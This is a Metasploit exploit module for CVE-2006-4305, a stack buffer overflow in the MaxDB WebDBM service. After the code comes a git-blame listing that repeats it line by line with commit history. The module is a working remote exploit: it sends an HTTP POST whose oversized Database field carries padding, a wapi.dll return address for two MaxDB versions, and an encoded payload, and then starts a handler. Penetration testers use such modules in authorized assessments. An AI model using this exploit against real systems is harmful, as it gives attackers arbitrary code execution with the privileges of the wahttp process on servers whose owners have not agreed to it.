modules/exploits/windows/http/maxdb_webdbm_database.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MaxDB WebDBM Database Parameter Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the MaxDB WebDBM
        service. By sending a specially-crafted HTTP request that contains
        an overly long database name. A remote attacker could overflow a buffer
        and execute arbitrary code on the system with privileges of the wahttp process.

        This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-4305'],
          ['OSVDB', '28300'],
          ['BID', '19660'],
        ],
      'DefaultOptions' =>
      {
        'EXITFUNC' => 'thread',
      },

      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MaxDB 7.6.00.16', { 'Ret' => 0x1005a08f } ], # wapi.dll
          [ 'MaxDB 7.6.00.27', { 'Ret' => 0x1005b08f } ], # wapi.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2006-08-29'))

    register_options( [ Opt::RPORT(9999) ])
  end

  def exploit
    connect

    server = rand_text_english(5, payload_badchars)
    user   = rand_text_english(5, payload_badchars)
    pass   = rand_text_english(5, payload_badchars)
    port   = rand(65535).to_s

    sploit =  rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')
    sploit << payload.encoded

    req    =  "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"
    req    << "&User=#{user}&Password=#{pass}"

    res    =  "POST /webdbm HTTP/1.1\r\n" + "Host: #{rhost}:#{port}\r\n"
    res    << "Content-Length: #{req.length}" + "\r\n\r\n" + req + "\r\n"

    print_status("Trying target %s..." % target.name)

    sock.put(res)

    #give wahttp.exe a bit to recover...
    select(nil,nil,nil,2)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`'Name' => 'MaxDB WebDBM Database Parameter Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in the MaxDB WebDBM`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`service. By sending a specially-crafted HTTP request that contains`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`an overly long database name. A remote attacker could overflow a buffer`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`and execute arbitrary code on the system with privileges of the wahttp process.`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`['CVE', '2006-4305'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '28300'],`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`['BID', '19660'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",`
			`'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",`
			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`[`
			`[ 'MaxDB 7.6.00.16', { 'Ret' => 0x1005a08f } ], # wapi.dll`
			`[ 'MaxDB 7.6.00.27', { 'Ret' => 0x1005b08f } ], # wapi.dll`
			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2006-08-29'))`
Retab modules 2013-08-30 16:28:54 -05:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options( [ Opt::RPORT(9999) ])`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`def exploit`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`server = rand_text_english(5, payload_badchars)`
			`user = rand_text_english(5, payload_badchars)`
			`pass = rand_text_english(5, payload_badchars)`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`port = rand(65535).to_s`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`sploit = rand_text_alphanumeric(91, payload_badchars) + [target.ret].pack('V')`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`sploit << payload.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}"`
			`req << "&User=#{user}&Password=#{pass}"`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`res = "POST /webdbm HTTP/1.1\r\n" + "Host: #{rhost}:#{port}\r\n"`
New exploit module from MC 2006-09-27 03:23:23 +00:00			`res << "Content-Length: #{req.length}" + "\r\n\r\n" + req + "\r\n"`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`print_status("Trying target %s..." % target.name)`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`sock.put(res)`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`#give wahttp.exe a bit to recover...`
Fixes #2134 . Subs select for sleep in exploit modules. 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,2)`
Retab modules 2013-08-30 16:28:54 -05:00
New exploit module from MC 2006-09-27 03:23:23 +00:00			`handler`
			`disconnect`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`